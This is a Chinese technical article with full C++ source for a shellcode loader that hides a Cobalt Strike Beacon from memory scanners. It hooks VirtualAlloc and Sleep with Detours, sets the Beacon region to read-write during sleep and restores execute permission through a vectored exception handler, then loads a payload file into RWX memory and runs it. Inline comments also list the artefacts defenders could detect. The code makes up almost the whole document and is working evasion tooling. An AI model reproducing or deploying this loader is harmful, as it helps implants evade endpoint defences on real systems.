基于VEH异常处理规避可读写内存
前言:本文的思路来自 WBGII。看完 WBGII 的这篇文章之后,学到了一种新的思路。
参考文章:https://xz.aliyun.com/t/9399
参考文章:https://www.cnblogs.com/zpchcbd/p/12425557.html
代码实现
// Walkthrough of a loader that hides its Beacon region while the implant sleeps:
// kernel32!VirtualAlloc and kernel32!Sleep are inline-hooked with Detours, a helper
// thread flips the recorded region to PAGE_READWRITE on every Sleep, and a Vectored
// Exception Handler restores PAGE_EXECUTE_READWRITE when that region is executed again.
// Read from the defender's side, the artefacts this program produces in its own process
// are: an AddVectoredExceptionHandler registration, repeated RW<->RWX VirtualProtect
// transitions on the same private region, Detours hooks on VirtualAlloc/Sleep, and an
// access-violation (0xc0000005) fault at every wake-up that is swallowed by the VEH.
#include "pch.h"
#include <iostream>
#include<Windows.h>
#include "detours.h"
#include "detver.h"
#pragma comment(lib,"detours_x64.lib")

LPVOID Beacon_address;                      // base returned by the most recent (hooked) VirtualAlloc
SIZE_T Beacon_data_len;                     // size passed to that VirtualAlloc
DWORD Beacon_Memory_address_flOldProtect;   // scratch out-parameter for every VirtualProtect call
HANDLE hEvent;                              // manual-reset event: NewSleep signals it, the helper thread waits on it
BOOL Vir_FLAG=TRUE;                         // one-shot latch so NewSleep frees shellcode_addr only once
LPVOID shellcode_addr;                      // buffer holding the file read in main()

// Trampoline to the original VirtualAlloc (filled in by DetourAttach).
static LPVOID (WINAPI *OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;

// Detour for VirtualAlloc: forwards the call unchanged but records the requested size
// and the returned base in the globals that the protection flips and the VEH range
// check operate on. Only the latest allocation is remembered.
// Note: Beacon_data_len is SIZE_T but is printed with %d (specifier/argument mismatch).
LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
{
    Beacon_data_len = dwSize;
    Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);
    printf("分配大小:%d", Beacon_data_len);
    printf("分配地址:%llx \n", Beacon_address);
    return Beacon_address;
}

// Trampoline to the original Sleep (filled in by DetourAttach).
static VOID (WINAPI *OldSleep)(DWORD dwMilliseconds) = Sleep;

// Detour for Sleep: on the first call it releases shellcode_addr (the buffer main()
// jumped into), then wakes the helper thread through hEvent and performs the real
// Sleep. By this point Beacon_address is presumably a different region, allocated via
// the hooked VirtualAlloc by whatever ran from shellcode_addr -- not verifiable here.
void WINAPI NewSleep(DWORD dwMilliseconds)
{
    if (Vir_FLAG) {
        VirtualFree(shellcode_addr, 0, MEM_RELEASE);
        Vir_FLAG = false;
    }
    printf("sleep时间:%d\n", dwMilliseconds);
    SetEvent(hEvent);           // helper thread will set the Beacon region to PAGE_READWRITE
    OldSleep(dwMilliseconds);
}

// Installs both Detours hooks in the current process (one transaction).
void Hook()
{
    DetourRestoreAfterWith();   // avoid hooking twice
    DetourTransactionBegin();   // begin the hook transaction
    DetourUpdateThread(GetCurrentThread());
    DetourAttach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);
    DetourAttach((PVOID*)&OldSleep, NewSleep);
    DetourTransactionCommit();  // commit the hooks
}

// Removes the VirtualAlloc detour only; the Sleep detour is not detached here.
void UnHook()
{
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourDetach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);
    DetourTransactionCommit();
}

// Returns the size in bytes of the file at szFilePath via fseek/ftell.
// The fopen result is used without a NULL check.
size_t GetSize(char * szFilePath)
{
    size_t size;
    FILE* f = fopen(szFilePath, "rb");
    fseek(f, 0, SEEK_END);
    size = ftell(f);
    rewind(f);
    fclose(f);
    return size;
}

// Reads the whole file at szFilePath into a new[] buffer and stores its length in
// *size. Returns NULL when the file is empty, cannot be opened, or fread returns 0.
// Ownership of the returned buffer passes to the caller (delete[]); main() never frees it.
unsigned char* ReadBinaryFile(char *szFilePath, size_t *size)
{
    unsigned char *p = NULL;
    FILE* f = NULL;
    size_t res = 0;
    *size = GetSize(szFilePath);
    if (*size == 0) return NULL;
    f = fopen(szFilePath, "rb");
    if (f == NULL) {
        printf("Binary file does not exists!\n");
        return 0;
    }
    p = new unsigned char[*size];
    // Read file
    rewind(f);
    res = fread(p, sizeof(unsigned char), *size, f);
    fclose(f);
    if (res == 0) {
        delete[] p;
        return NULL;
    }
    return p;
}

// Range check used by the VEH: true when Exception_addr lies inside the recorded
// Beacon region. The lower bound is strict (>), so an address equal to Beacon_address
// itself is reported as outside the region.
BOOL is_Exception(DWORD64 Exception_addr)
{
    if (Exception_addr < ((DWORD64)Beacon_address + Beacon_data_len) && Exception_addr >(DWORD64)Beacon_address) {
        printf("地址符合:%llx\n", Exception_addr);
        return true;
    }
    printf("地址不符合:%llx\n", Exception_addr);
    return false;
}

// First-chance vectored handler. When an access violation (0xc0000005 =
// STATUS_ACCESS_VIOLATION) is raised with Rip inside the Beacon region, the region is
// made executable again and execution resumes at the faulting instruction. Every other
// exception is passed on to the next handler.
LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)
{
    printf("FirstVectExcepHandler\n");
    printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);
    printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);
    if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005 && is_Exception(pExcepInfo->ContextRecord->Rip)) {
        printf("恢复Beacon内存属性\n");
        VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    return EXCEPTION_CONTINUE_SEARCH;
}

// Helper thread body: each time NewSleep signals hEvent, strip execute permission from
// the Beacon region and re-arm the (manual-reset) event. Loops forever; the trailing
// return is never reached. lpParameter is unused.
DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)
{
    printf("Beacon_set_Memory_attributes启动\n");
    while (true) {
        WaitForSingleObject(hEvent, INFINITE);  // wait for the signal from NewSleep
        printf("设置Beacon内存属性不可执行\n");
        VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);
        ResetEvent(hEvent);                     // block again until the next Sleep
    }
    return 0;
}

// Entry point: registers the VEH (priority 1 = called first), installs the hooks,
// starts the helper thread, reads the payload file, copies it into a region obtained
// through the now-hooked VirtualAlloc (so it becomes the initial Beacon_address),
// marks it RWX and jumps into it. ReadBinaryFile's NULL return is not checked before
// the memcpy. The thread handle is closed immediately; the thread keeps running.
int main()
{
    hEvent = CreateEvent(NULL, TRUE, false, NULL);      // manual-reset, initially unsignaled
    AddVectoredExceptionHandler(1, &FirstVectExcepHandler);
    Hook();                 // VirtualAlloc and Sleep are hooked from here on (the original comment said VirtualProtect, which is not hooked)
    HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);
    CloseHandle(hThread1);
    unsigned char *BinData = NULL;
    size_t size = 0;
    char* szFilePath = "C:\\Users\\WBG\\Downloads\\Test.bin";
    BinData = ReadBinaryFile(szFilePath, &size);
    shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);   // goes through NewVirtualAlloc
    memcpy(shellcode_addr, BinData, size);
    VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);
    (*(int(*)()) shellcode_addr)();
    UnHook();
    return 0;
}